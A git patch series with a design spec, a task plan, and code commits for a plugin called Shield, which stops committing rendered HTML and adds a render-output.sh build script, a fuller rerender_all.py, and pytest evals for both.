From bc4546f8fdc9d3b5f4a9e2312f24cbb5f2d713a7 Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 13:29:34 +0530 Subject: [PATCH 01/10] =?UTF-8?q?docs(spec):=20single=20canonical=20Shield?= =?UTF-8?q?=20output=20=E2=80=94=20Markdown=20source,=20HTML=20as=20build?= =?UTF-8?q?=20artifact?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Design spec: Markdown is the one committed/authored output; HTML + site assets become local, gitignored build artifacts regenerated on demand by a render-output.sh build script, triggered by a thin /shield render command. Co-Authored-By: Claude Opus 4.8 (1M context) --- ...8-shield-single-canonical-output-design.md | 150 ++++++++++++++++++ 1 file changed, 150 insertions(+) create mode 100644 docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md diff --git a/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md b/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md new file mode 100644 index 00000000..54fc0d6d --- /dev/null +++ b/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md @@ -0,0 +1,150 @@ +# Shield: one canonical output (Markdown), HTML as a build artifact + +**Date:** 2026-06-08 +**Status:** Approved (design) — pending spec review +**Scope:** Shield plugin output artifacts (`docs/shield/`) + +## Problem + +Shield writes every artifact twice and commits both: + +- `docs/shield/{feature}/*.md` — the authored Markdown +- `docs/shield/{feature}/outputs/**/*.html` — an HTML mirror, plus generated + site assets at the `docs/shield/` root (`index.html`, `manifest.js`, + `shield.css`, `shield-nav.js`, `shield-dashboard.js`) + +Today 41 HTML files are tracked in git alongside their Markdown. This is +confusing and wasteful because the HTML carries **no unique information** — it +is rendered purely from Markdown by `shield/scripts/render-markdown.sh`. The +real dependency chain is one-way: + +``` +JSON sidecar (plan.json, prd.meta.json) ← structured source of truth + ↓ authored or rendered +Markdown (.md) ← canonical human deliverable + ↓ render-markdown.sh (pure render) +HTML (.html) + site assets ← view-only, regenerable +``` + +Committing both means: two parallel trees that must stay in sync, doubled diffs +on every change, and a standing drift risk (hand-edited HTML, or stale HTML). + +## Decision + +**Markdown is the single canonical, committed, authored output.** HTML is +demoted to a **local build artifact** — generated on demand, never committed, +treated like `dist/`. + +Chosen over two alternatives: + +- **Keep both committed + CI drift-guard** — rejected; keeps the double tree and + doubled diffs, only papers over the smell. +- **Drop HTML entirely** — rejected; the browsable dashboard (nav, Mermaid, + cross-linking) is the real consumer. + +Confirmed constraint: people open the HTML **locally** in a browser. Nothing +hosts/serves the committed `outputs/` tree, so gitignoring HTML costs only a +"build before you browse" step. + +## Design + +### 1. What stays committed vs. ignored + +**Committed (canonical / source):** +- All `*.md` under `docs/shield/` +- All JSON sidecars: `manifest.json`, `plan.json`, `*.meta.json`, + `*-comments.json`, `grades.json` + +**Gitignored (generated, regenerable):** +- `docs/shield/**/outputs/` — every rendered per-artifact HTML tree +- `docs/shield/index.html` +- `docs/shield/manifest.js` +- `docs/shield/shield.css`, `docs/shield/shield-nav.js`, + `docs/shield/shield-dashboard.js` + +Note: `manifest.json` stays committed (it is the index source); `manifest.js` +is a generated JS mirror and is ignored. + +### 2. Remove already-committed HTML + +`git rm --cached` the 41 tracked `.html` files plus the tracked root site +assets (`docs/shield/index.html`, `docs/shield/manifest.js`). Add the +`.gitignore` rules above in the same commit so they don't reappear. + +### 3. Renderers are unchanged + +Skills keep calling `render-markdown.sh` and `write_shield_assets.py` exactly as +they do now. The only difference is the output lands in a gitignored location, +so it never enters a diff. **No renderer code changes.** + +### 4. Build script + thin command trigger + +Two pieces, clearly separated: + +**A. The build script — `shield/scripts/render-output.sh`** (the orchestrator). +This is where all the conversion logic lives. Given an optional feature, it +regenerates the full HTML site from committed Markdown + `manifest.json`: + +- No feature arg → rebuild the whole `docs/shield/` site (every feature's + `outputs/*.html` + the root dashboard `index.html` and assets). +- With a feature arg → rebuild just that feature's `outputs/` + refresh the + root dashboard/manifest assets. + +It is a thin wrapper that drives the **existing** machinery — it loops the +relevant `.md` files through `render-markdown.sh` and then calls +`write_shield_assets.py`. It introduces **no new renderer**. Being a standalone +script, it is runnable and testable on its own (which the eval relies on). + +**B. The command — `/shield render [feature]`** (skill). A thin trigger that +just invokes `render-output.sh [feature]` and reports where the built site is. +No conversion logic in the command itself. + +This is the "build before you browse / share" entry point, run on demand. + +### 5. Skill prose / path references + +Audit the authoring skills (`research`, `prd-docs`, `plan-docs`, `lld-docs`, +`prd-review`, `plan-review`, `review`) and the `output-paths.yaml` registry for +any language that presents the `.html`/`outputs/` paths as *committed +deliverables*. Update them to describe HTML as a local build artifact and point +users at `/shield render` to view. Markdown paths remain the deliverables they +report. + +## Out of scope (YAGNI) + +- New export formats (PDF, Confluence). Markdown-as-source makes these easy + later, but none are built now. +- Hosting/serving the dashboard. Local-open only. +- Changing the renderer, shell template, or dashboard behavior. +- Touching the JSON sidecar schemas. + +## Risks / notes + +- **Existing clones with committed HTML:** after this lands, `git rm --cached` + leaves their working-tree HTML in place but now ignored; harmless. Fresh + clones simply won't have HTML until they run `/shield render`. +- **"I opened a stale/missing HTML":** mitigated by the explicit `/shield + render` step and by the fact that rendering is cheap and idempotent. + +## Eval coverage (per CLAUDE.md — mandatory for plugin asset changes) + +This touches plugin assets (new `/shield render` command + skill-prose edits), +so the PR must ship at least one executable eval. Candidate coverage: + +- An eval that runs `render-output.sh` directly against a fixture feature with + committed `.md` + `manifest.json` and asserts the expected `outputs/*.html`, + root `index.html`, and assets are produced (and match a render of the + Markdown). Testing the script directly avoids going through the command layer. +- A repo-hygiene check (eval or test) asserting no `*.html` / generated site + assets are tracked under `docs/shield/` and that the `.gitignore` rules cover + them. + +## Definition of done + +1. `.gitignore` updated; 41 `.html` + root site assets untracked. +2. `render-output.sh` build script added (wraps existing renderers); `/shield + render` command added as a thin trigger. +3. Skill prose + `output-paths.yaml` updated to call HTML a build artifact. +4. Eval(s) above land in the same PR; RED→GREEN paper trail recorded. +5. Plugin version bumped in `.claude-plugin/marketplace.json` (and + `pyproject.toml` if applicable). From 1ee3eab00f63a47f6f6f7a09c336be11c5aff6b1 Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 13:45:10 +0530 Subject: [PATCH 02/10] docs(plan): implementation plan for single canonical Shield output Six tasks: complete rerender_all coverage (enhanced-*/detailed/*), add render-output.sh build script, /shield render command, gitignore+untrack HTML, prose updates, version bump. Each task is TDD with an executable eval. Co-Authored-By: Claude Opus 4.8 (1M context) --- ...26-06-08-shield-single-canonical-output.md | 511 ++++++++++++++++++ 1 file changed, 511 insertions(+) create mode 100644 docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md diff --git a/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md b/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md new file mode 100644 index 00000000..08a7c49f --- /dev/null +++ b/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md @@ -0,0 +1,511 @@ +# Shield Single Canonical Output Implementation Plan + +> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking. + +**Goal:** Make Markdown the single committed Shield output and demote HTML to a locally-built, gitignored artifact regenerated on demand by one build script. + +**Architecture:** Reuse the existing renderers. First make the existing `rerender_all.py` *complete* so it regenerates every HTML we currently commit (main docs, review summaries, **and** the `enhanced-*` / `detailed/*` reviewer docs it currently skips). Add a thin `render-output.sh` that runs `rerender_all.py` (pages) then `write_shield_assets.py` (dashboard + assets). Add a `/shield render` command that just triggers the script. Then `.gitignore` all generated HTML/site assets and `git rm --cached` the 41 already-tracked HTML files + root assets. Finally update path-registry/CLAUDE.md prose to call HTML a build artifact. + +**Tech Stack:** Bash + Python 3 (stdlib only for orchestration), `uv` for the markdown-it render dependency, `pytest` for evals. All under `shield/scripts/`. + +--- + +## Spec + +Design doc: `docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md` + +## File Structure + +**Modify:** +- `shield/scripts/rerender_all.py` — extend `rerender_all()` to also render `enhanced-*.md` and `detailed/*.md` review sources. Stays page-rendering only (single responsibility). +- `.gitignore` — add rules for generated HTML + root site assets. +- `shield/schema/output-paths.yaml` — header note: `*_html` paths are local build artifacts. +- `CLAUDE.md` — the artifact-output note (currently says "Rendered HTML lands under …") gains "(build artifact — gitignored; run `/shield render`)". + +**Create:** +- `shield/scripts/render-output.sh` — the build script (orchestrator): `rerender_all.py` + `write_shield_assets.py`. +- `shield/commands/render.md` — `/shield render` command (thin trigger). +- `shield/scripts/test_rerender_all.py` — eval: completeness of rendered set. +- `shield/scripts/test_render_output.py` — eval: end-to-end build produces pages **and** assets. +- `shield/scripts/test_gitignore_html_artifacts.py` — eval: `.gitignore` covers the generated artifacts. + +**Remove from git (keep on disk):** +- 41 tracked `*.html` under `docs/shield/**/outputs/`, plus `docs/shield/index.html` and `docs/shield/manifest.js`. + +--- + +## Task 1: Make `rerender_all.py` render the complete HTML set + +Today `rerender_all.py` renders the five main docs + `reviews/*/*/summary.md` only. It silently skips `enhanced-*.md` and `detailed/*.md`, which ARE committed as HTML today. Fix that so nothing is lost when we stop committing HTML. + +**Files:** +- Create: `shield/scripts/test_rerender_all.py` +- Modify: `shield/scripts/rerender_all.py` (the `rerender_all` function body, after the existing `summary.md` loop) + +- [ ] **Step 1: Write the failing test** + +Create `shield/scripts/test_rerender_all.py`: + +```python +"""Eval for rerender_all.py — renders the COMPLETE committed HTML set, +including enhanced-* and detailed/* review docs (regression: those were skipped).""" +from __future__ import annotations + +import importlib.util +import json +import subprocess +from pathlib import Path + +SPEC = Path(__file__).resolve().parent / "rerender_all.py" +_spec = importlib.util.spec_from_file_location("rerender_all", SPEC) +ra = importlib.util.module_from_spec(_spec) +_spec.loader.exec_module(ra) + + +def _fixture(root: Path) -> None: + """A feature with a main doc + a plan review that has summary, enhanced, detailed.""" + feat = root / "feat-x" + (feat).mkdir(parents=True) + (root / "manifest.json").write_text(json.dumps({"schema_version": "2.1", "features": []})) + (feat / "prd.md").write_text("# PRD\n\nbody\n") + rev = feat / "reviews" / "plan" / "2026-06-08" + (rev / "detailed").mkdir(parents=True) + (rev / "summary.md").write_text("# Summary\n\nbody\n") + (rev / "enhanced-plan.md").write_text("# Enhanced\n\nbody\n") + (rev / "detailed" / "agile-coach.md").write_text("# Agile\n\nbody\n") + + +def test_renders_enhanced_and_detailed(tmp_path): + _fixture(tmp_path) + rc = ra.rerender_all(tmp_path) + assert rc == 0 + out = tmp_path / "feat-x" / "outputs" + expected = [ + out / "prd.html", + out / "reviews" / "plan" / "2026-06-08" / "summary.html", + out / "reviews" / "plan" / "2026-06-08" / "enhanced-plan.html", + out / "reviews" / "plan" / "2026-06-08" / "detailed" / "agile-coach.html", + ] + for p in expected: + assert p.is_file(), f"missing rendered page: {p}" +``` + +- [ ] **Step 2: Run test to verify it fails** + +Run: `cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" pytest test_rerender_all.py -v` +Expected: FAIL — `enhanced-plan.html` and `detailed/agile-coach.html` are missing (rerender_all skips them today). + +- [ ] **Step 3: Add the enhanced + detailed render loops** + +In `shield/scripts/rerender_all.py`, inside `rerender_all()`, immediately AFTER this existing block: + +```python + for summary in feature.glob("reviews/*/*/summary.md"): + rel = summary.relative_to(feature).with_suffix(".html") + _render(summary, feature / "outputs" / rel, + f"Review — {feature.name}", output_dir) + count += 1 +``` + +add: + +```python + for enhanced in feature.glob("reviews/*/*/enhanced-*.md"): + rel = enhanced.relative_to(feature).with_suffix(".html") + _render(enhanced, feature / "outputs" / rel, + f"Review — {feature.name}", output_dir) + count += 1 + for detailed in feature.glob("reviews/*/*/detailed/*.md"): + rel = detailed.relative_to(feature).with_suffix(".html") + _render(detailed, feature / "outputs" / rel, + f"Review — {feature.name}", output_dir) + count += 1 +``` + +- [ ] **Step 4: Run test to verify it passes** + +Run: `cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" pytest test_rerender_all.py -v` +Expected: PASS + +- [ ] **Step 5: Commit** + +```bash +git add shield/scripts/rerender_all.py shield/scripts/test_rerender_all.py +git commit -m "fix(shield): rerender_all renders enhanced-* and detailed/* review docs" +``` + +--- + +## Task 2: Create `render-output.sh` build script + +The orchestrator the user asked for: renders all pages, then writes the dashboard + shared assets. Idempotent. + +**Files:** +- Create: `shield/scripts/render-output.sh` +- Create: `shield/scripts/test_render_output.py` + +- [ ] **Step 1: Write the failing test** + +Create `shield/scripts/test_render_output.py`: + +```python +"""Eval for render-output.sh — the full build: pages + dashboard assets.""" +from __future__ import annotations + +import json +import subprocess +from pathlib import Path + +SCRIPT = Path(__file__).resolve().parent / "render-output.sh" + + +def test_build_produces_pages_and_assets(tmp_path): + feat = tmp_path / "feat-x" + feat.mkdir(parents=True) + (tmp_path / "manifest.json").write_text( + json.dumps({"schema_version": "2.1", "features": [{"name": "feat-x"}]}) + ) + (feat / "prd.md").write_text("# PRD\n\nbody\n") + + res = subprocess.run([str(SCRIPT), str(tmp_path)], capture_output=True, text=True) + assert res.returncode == 0, res.stderr + + # pages + assert (feat / "outputs" / "prd.html").is_file() + # dashboard + shared assets + for asset in ["manifest.js", "index.html", "shield.css", + "shield-nav.js", "shield-dashboard.js"]: + assert (tmp_path / asset).is_file(), f"missing asset {asset}" + + +def test_missing_dir_errors(tmp_path): + res = subprocess.run([str(SCRIPT), str(tmp_path / "nope")], + capture_output=True, text=True) + assert res.returncode == 2 + assert "not a dir" in res.stderr +``` + +- [ ] **Step 2: Run test to verify it fails** + +Run: `cd shield/scripts && uv run --with pytest pytest test_render_output.py -v` +Expected: FAIL — `render-output.sh` does not exist yet. + +- [ ] **Step 3: Write the build script** + +Create `shield/scripts/render-output.sh`: + +```bash +#!/usr/bin/env bash +# Build the full Shield HTML site from committed Markdown. +# +# Step 1: render every source .md to its outputs/*.html (rerender_all.py) +# Step 2: write the dashboard + shared assets (write_shield_assets.py) +# +# HTML is a build artifact: it is gitignored and regenerated on demand. +# Markdown + JSON sidecars are the committed source of truth. +# +# Usage: +# render-output.sh [OUTPUT_DIR] +# OUTPUT_DIR defaults to /docs/shield +set -euo pipefail + +SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" + +OUTPUT_DIR="${1:-}" +if [[ -z "$OUTPUT_DIR" ]]; then + ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)" + OUTPUT_DIR="$ROOT/docs/shield" +fi + +if [[ ! -d "$OUTPUT_DIR" ]]; then + echo "render-output: not a dir: $OUTPUT_DIR" >&2 + exit 2 +fi + +python3 "$SCRIPT_DIR/rerender_all.py" --output-dir "$OUTPUT_DIR" +python3 "$SCRIPT_DIR/write_shield_assets.py" --output-dir "$OUTPUT_DIR" +echo "render-output: site built at $OUTPUT_DIR" +``` + +- [ ] **Step 4: Make it executable** + +Run: `chmod +x shield/scripts/render-output.sh` +Expected: no output (the repo's pre-commit "scripts with shebangs are executable" hook requires this). + +- [ ] **Step 5: Run test to verify it passes** + +Run: `cd shield/scripts && uv run --with pytest pytest test_render_output.py -v` +Expected: PASS (both tests) + +- [ ] **Step 6: Commit** + +```bash +git add shield/scripts/render-output.sh shield/scripts/test_render_output.py +git commit -m "feat(shield): render-output.sh — one build script for the HTML site" +``` + +--- + +## Task 3: Add the `/shield render` command + +A thin trigger. No logic — it invokes `render-output.sh`. + +**Files:** +- Create: `shield/commands/render.md` + +- [ ] **Step 1: Write the command** + +Create `shield/commands/render.md` (mirrors the frontmatter style of `shield/commands/analyze-plan.md`): + +```markdown +--- +name: render +description: Build the browsable Shield HTML site locally from committed Markdown +args: "[output dir — optional, defaults to docs/shield]" +--- + +# Render Shield Output + +Shield commits Markdown + JSON sidecars only. HTML (per-artifact pages and the +browsable dashboard) is a **local build artifact** — gitignored and regenerated +on demand. Run this command to (re)build the site, then open the HTML locally. + +## Usage + +`/shield render` — rebuild the whole site under `docs/shield/` +`/shield render ` — rebuild a site rooted at a custom dir + +## Behavior + +1. Run the build script, which renders every source `.md` to its + `outputs/*.html` and then writes the dashboard (`index.html`) and shared + assets (`manifest.js`, CSS, nav JS): + + ```bash + "$CLAUDE_PLUGIN_ROOT/scripts/render-output.sh" "$ARGUMENTS" + ``` + + (`$ARGUMENTS` is empty for the default `docs/shield/` location.) + +2. Report the built site path and remind the user the output is gitignored — + open `docs/shield/index.html` in a browser to view. + +## Important + +- This command does NOT author or modify any Markdown — it only renders. +- HTML is never committed; do not `git add` anything under `outputs/` or the + generated root assets. +``` + +- [ ] **Step 2: Verify the command file parses (frontmatter present)** + +Run: `head -6 shield/commands/render.md` +Expected: shows the `---` frontmatter block with `name: render`. + +- [ ] **Step 3: Commit** + +```bash +git add shield/commands/render.md +git commit -m "feat(shield): /shield render command triggers render-output.sh" +``` + +--- + +## Task 4: Gitignore generated HTML and untrack the committed files + +**Files:** +- Modify: `.gitignore` +- Create: `shield/scripts/test_gitignore_html_artifacts.py` +- Remove from index: tracked `*.html` + root assets under `docs/shield/` + +- [ ] **Step 1: Write the failing hygiene test** + +Create `shield/scripts/test_gitignore_html_artifacts.py`: + +```python +"""Eval: .gitignore demotes Shield HTML to a build artifact.""" +from __future__ import annotations + +import subprocess +from pathlib import Path + +ROOT = Path(__file__).resolve().parents[2] # repo root +GITIGNORE = ROOT / ".gitignore" + +REQUIRED_PATTERNS = [ + "**/docs/shield/*/outputs/", + "**/docs/shield/index.html", + "**/docs/shield/manifest.js", +] + + +def test_gitignore_has_html_artifact_rules(): + text = GITIGNORE.read_text() + for pat in REQUIRED_PATTERNS: + assert pat in text, f".gitignore missing rule: {pat}" + + +def test_no_shield_html_tracked(): + out = subprocess.run( + ["git", "ls-files", "docs/shield/**/*.html", "docs/shield/manifest.js"], + cwd=ROOT, capture_output=True, text=True, + ) + tracked = [l for l in out.stdout.splitlines() if l.strip()] + assert tracked == [], f"HTML/assets still tracked: {tracked}" +``` + +- [ ] **Step 2: Run test to verify it fails** + +Run: `cd shield/scripts && uv run --with pytest pytest test_gitignore_html_artifacts.py -v` +Expected: FAIL — patterns absent and 41+ HTML files still tracked. + +- [ ] **Step 3: Add the `.gitignore` rules** + +Append to `.gitignore` (after the existing `**/docs/shield/*/.session-transcript.md` block): + +```gitignore +# Shield HTML is a BUILD ARTIFACT, not a source. Markdown + JSON sidecars are +# the committed source of truth. Regenerate the site locally with /shield +# render (scripts/render-output.sh). See docs/superpowers/specs/ +# 2026-06-08-shield-single-canonical-output-design.md +**/docs/shield/*/outputs/ +**/docs/shield/index.html +**/docs/shield/manifest.js +**/docs/shield/shield.css +**/docs/shield/shield-nav.js +**/docs/shield/shield-dashboard.js +``` + +- [ ] **Step 4: Untrack the already-committed HTML + root assets (keep on disk)** + +Run: + +```bash +git ls-files -z \ + 'docs/shield/*/outputs/**' \ + 'docs/shield/index.html' \ + 'docs/shield/manifest.js' \ + 'docs/shield/shield.css' \ + 'docs/shield/shield-nav.js' \ + 'docs/shield/shield-dashboard.js' \ + | xargs -0 --no-run-if-empty git rm --cached --quiet +``` + +Expected: lists the removed paths (≈41 html + index.html + manifest.js). Files remain on disk; only the index entries are dropped. + +- [ ] **Step 5: Run test to verify it passes** + +Run: `cd shield/scripts && uv run --with pytest pytest test_gitignore_html_artifacts.py -v` +Expected: PASS (both tests) + +- [ ] **Step 6: Verify the build still reproduces what was removed** + +Run: `shield/scripts/render-output.sh` then `git status --porcelain docs/shield | grep -c '\.html$' || true` +Expected: `0` — regenerated HTML is ignored (not showing as untracked), proving the build replaces the removed committed files. + +- [ ] **Step 7: Commit** + +```bash +git add .gitignore shield/scripts/test_gitignore_html_artifacts.py +git commit -m "build(shield): gitignore HTML build artifacts; untrack committed HTML" +``` + +--- + +## Task 5: Update path-registry + artifact-output prose + +Stop describing HTML as a committed deliverable; point readers at `/shield render`. The "Rendered HTML lands under …" phrasing lives in exactly three places (confirmed by grep): `shield/hooks/scripts/session-start.sh`, `shield/docs/artifacts.md`, `shield/skills/general/manifest-schema.md`. The per-skill render steps still run unchanged — they just produce gitignored output. + +**Files:** +- Modify: `shield/schema/output-paths.yaml` (top-of-file header comment) +- Modify: `shield/hooks/scripts/session-start.sh` +- Modify: `shield/docs/artifacts.md` +- Modify: `shield/skills/general/manifest-schema.md` + +- [ ] **Step 1: Add a header note to `output-paths.yaml`** + +At the very top of `shield/schema/output-paths.yaml`, add (above the first existing line): + +```yaml +# NOTE: All `*_html` entries below are LOCAL BUILD ARTIFACTS — gitignored and +# regenerated on demand by /shield render (scripts/render-output.sh). The +# committed source of truth is the corresponding Markdown (+ JSON sidecars). +``` + +- [ ] **Step 2: Inspect the three "Rendered HTML lands under" call-sites** + +Run: `grep -n "Rendered HTML lands under" shield/hooks/scripts/session-start.sh shield/docs/artifacts.md shield/skills/general/manifest-schema.md` +Expected: one matching line per file. Read each line's surrounding sentence so the edit in Step 3 matches the exact existing text. + +- [ ] **Step 3: Append the build-artifact parenthetical in each of the three files** + +In each file, edit the sentence that begins "Rendered HTML lands under `docs/shield/{feature}/outputs/`" so it ends with the parenthetical. The target sentence must read: + +``` +Rendered HTML lands under `docs/shield/{feature}/outputs/` (build artifact — gitignored; rebuild locally with `/shield render`). +``` + +(Preserve each file's surrounding punctuation/markup; only insert the ` (build artifact — gitignored; rebuild locally with `/shield render`)` clause before the trailing period.) + +- [ ] **Step 4: Grep for any remaining "committed HTML" phrasing** + +Run: `grep -rniE "commit.*\.html|html.*deliverable" shield/ || echo "none"` +Expected: `none` (no prose describing HTML as committed). + +- [ ] **Step 5: Commit** + +```bash +git add shield/schema/output-paths.yaml shield/hooks/scripts/session-start.sh \ + shield/docs/artifacts.md shield/skills/general/manifest-schema.md +git commit -m "docs(shield): describe HTML output as a gitignored build artifact" +``` + +--- + +## Task 6: Version bump + +Per CLAUDE.md: bump the plugin version in `marketplace.json` for any plugin change. Shield has no root `pyproject.toml` (only `shield/backlog/` and `shield/parsers/` have them, untouched here), so only `marketplace.json` changes. + +**Files:** +- Modify: `.claude-plugin/marketplace.json` (shield `version`) + +- [ ] **Step 1: Bump shield version** + +In `.claude-plugin/marketplace.json`, change the `shield` entry `"version": "2.27.0"` to `"version": "2.28.0"` (minor bump — new command + behavior change). + +- [ ] **Step 2: Verify JSON is valid** + +Run: `python3 -m json.tool .claude-plugin/marketplace.json > /dev/null && echo OK` +Expected: `OK` + +- [ ] **Step 3: Commit** + +```bash +git add .claude-plugin/marketplace.json +git commit -m "chore(shield): bump to 2.28.0 — Markdown-canonical output + /shield render" +``` + +--- + +## Final verification (run before opening PR) + +- [ ] **Run the full new eval set:** + +Run: +```bash +cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" \ + pytest test_rerender_all.py test_render_output.py test_gitignore_html_artifacts.py -v +``` +Expected: all PASS. + +- [ ] **Confirm no HTML is tracked and the build regenerates cleanly:** + +Run: +```bash +git ls-files 'docs/shield/**/*.html' | wc -l # expect 0 +shield/scripts/render-output.sh +git status --porcelain docs/shield | grep '\.html$' || echo "clean (html ignored)" +``` +Expected: `0`, then `clean (html ignored)`. + +- [ ] **PR body notes:** the `/shield render` command is a thin trigger fully exercised by `test_render_output.py`; completeness regression covered by `test_rerender_all.py`; repo hygiene by `test_gitignore_html_artifacts.py`. No `pyproject.toml` bump (shield root has none). From 72b3596680281ff76783978b83e1c8b23ff4086e Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 08:25:05 +0000 Subject: [PATCH 03/10] fix(shield): rerender_all renders enhanced-* and detailed/* review docs Co-Authored-By: Claude Opus 4.7 (1M context) --- shield/scripts/rerender_all.py | 10 +++++++ shield/scripts/test_rerender_all.py | 41 +++++++++++++++++++++++++++++ 2 files changed, 51 insertions(+) create mode 100644 shield/scripts/test_rerender_all.py diff --git a/shield/scripts/rerender_all.py b/shield/scripts/rerender_all.py index b1f82783..b2890d86 100755 --- a/shield/scripts/rerender_all.py +++ b/shield/scripts/rerender_all.py @@ -50,6 +50,16 @@ def rerender_all(output_dir: Path) -> int: _render(summary, feature / "outputs" / rel, f"Review — {feature.name}", output_dir) count += 1 + for enhanced in feature.glob("reviews/*/*/enhanced-*.md"): + rel = enhanced.relative_to(feature).with_suffix(".html") + _render(enhanced, feature / "outputs" / rel, + f"Review — {feature.name}", output_dir) + count += 1 + for detailed in feature.glob("reviews/*/*/detailed/*.md"): + rel = detailed.relative_to(feature).with_suffix(".html") + _render(detailed, feature / "outputs" / rel, + f"Review — {feature.name}", output_dir) + count += 1 print(f"rerender_all: rendered {count} page(s)") return 0 diff --git a/shield/scripts/test_rerender_all.py b/shield/scripts/test_rerender_all.py new file mode 100644 index 00000000..b85fb333 --- /dev/null +++ b/shield/scripts/test_rerender_all.py @@ -0,0 +1,41 @@ +"""Eval for rerender_all.py — renders the COMPLETE committed HTML set, +including enhanced-* and detailed/* review docs (regression: those were skipped).""" +from __future__ import annotations + +import importlib.util +import json +import subprocess +from pathlib import Path + +SPEC = Path(__file__).resolve().parent / "rerender_all.py" +_spec = importlib.util.spec_from_file_location("rerender_all", SPEC) +ra = importlib.util.module_from_spec(_spec) +_spec.loader.exec_module(ra) + + +def _fixture(root: Path) -> None: + """A feature with a main doc + a plan review that has summary, enhanced, detailed.""" + feat = root / "feat-x" + (feat).mkdir(parents=True) + (root / "manifest.json").write_text(json.dumps({"schema_version": "2.1", "features": []})) + (feat / "prd.md").write_text("# PRD\n\nbody\n") + rev = feat / "reviews" / "plan" / "2026-06-08" + (rev / "detailed").mkdir(parents=True) + (rev / "summary.md").write_text("# Summary\n\nbody\n") + (rev / "enhanced-plan.md").write_text("# Enhanced\n\nbody\n") + (rev / "detailed" / "agile-coach.md").write_text("# Agile\n\nbody\n") + + +def test_renders_enhanced_and_detailed(tmp_path): + _fixture(tmp_path) + rc = ra.rerender_all(tmp_path) + assert rc == 0 + out = tmp_path / "feat-x" / "outputs" + expected = [ + out / "prd.html", + out / "reviews" / "plan" / "2026-06-08" / "summary.html", + out / "reviews" / "plan" / "2026-06-08" / "enhanced-plan.html", + out / "reviews" / "plan" / "2026-06-08" / "detailed" / "agile-coach.html", + ] + for p in expected: + assert p.is_file(), f"missing rendered page: {p}" From 8a8dc6534e11d9466ac8d72b593fe3ea897cecbf Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 08:25:40 +0000 Subject: [PATCH 04/10] =?UTF-8?q?feat(shield):=20render-output.sh=20?= =?UTF-8?q?=E2=80=94=20one=20build=20script=20for=20the=20HTML=20site?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.7 (1M context) --- shield/scripts/render-output.sh | 30 ++++++++++++++++++++++++ shield/scripts/test_render_output.py | 34 ++++++++++++++++++++++++++++ 2 files changed, 64 insertions(+) create mode 100755 shield/scripts/render-output.sh create mode 100644 shield/scripts/test_render_output.py diff --git a/shield/scripts/render-output.sh b/shield/scripts/render-output.sh new file mode 100755 index 00000000..fd4d0ae5 --- /dev/null +++ b/shield/scripts/render-output.sh @@ -0,0 +1,30 @@ +#!/usr/bin/env bash +# Build the full Shield HTML site from committed Markdown. +# +# Step 1: render every source .md to its outputs/*.html (rerender_all.py) +# Step 2: write the dashboard + shared assets (write_shield_assets.py) +# +# HTML is a build artifact: it is gitignored and regenerated on demand. +# Markdown + JSON sidecars are the committed source of truth. +# +# Usage: +# render-output.sh [OUTPUT_DIR] +# OUTPUT_DIR defaults to /docs/shield +set -euo pipefail + +SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" + +OUTPUT_DIR="${1:-}" +if [[ -z "$OUTPUT_DIR" ]]; then + ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)" + OUTPUT_DIR="$ROOT/docs/shield" +fi + +if [[ ! -d "$OUTPUT_DIR" ]]; then + echo "render-output: not a dir: $OUTPUT_DIR" >&2 + exit 2 +fi + +python3 "$SCRIPT_DIR/rerender_all.py" --output-dir "$OUTPUT_DIR" +python3 "$SCRIPT_DIR/write_shield_assets.py" --output-dir "$OUTPUT_DIR" +echo "render-output: site built at $OUTPUT_DIR" diff --git a/shield/scripts/test_render_output.py b/shield/scripts/test_render_output.py new file mode 100644 index 00000000..a62b4344 --- /dev/null +++ b/shield/scripts/test_render_output.py @@ -0,0 +1,34 @@ +"""Eval for render-output.sh — the full build: pages + dashboard assets.""" +from __future__ import annotations + +import json +import subprocess +from pathlib import Path + +SCRIPT = Path(__file__).resolve().parent / "render-output.sh" + + +def test_build_produces_pages_and_assets(tmp_path): + feat = tmp_path / "feat-x" + feat.mkdir(parents=True) + (tmp_path / "manifest.json").write_text( + json.dumps({"schema_version": "2.1", "features": [{"name": "feat-x"}]}) + ) + (feat / "prd.md").write_text("# PRD\n\nbody\n") + + res = subprocess.run([str(SCRIPT), str(tmp_path)], capture_output=True, text=True) + assert res.returncode == 0, res.stderr + + # pages + assert (feat / "outputs" / "prd.html").is_file() + # dashboard + shared assets + for asset in ["manifest.js", "index.html", "shield.css", + "shield-nav.js", "shield-dashboard.js"]: + assert (tmp_path / asset).is_file(), f"missing asset {asset}" + + +def test_missing_dir_errors(tmp_path): + res = subprocess.run([str(SCRIPT), str(tmp_path / "nope")], + capture_output=True, text=True) + assert res.returncode == 2 + assert "not a dir" in res.stderr From af977e135117e7d160e1518be33bad164b0a9a61 Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 08:26:05 +0000 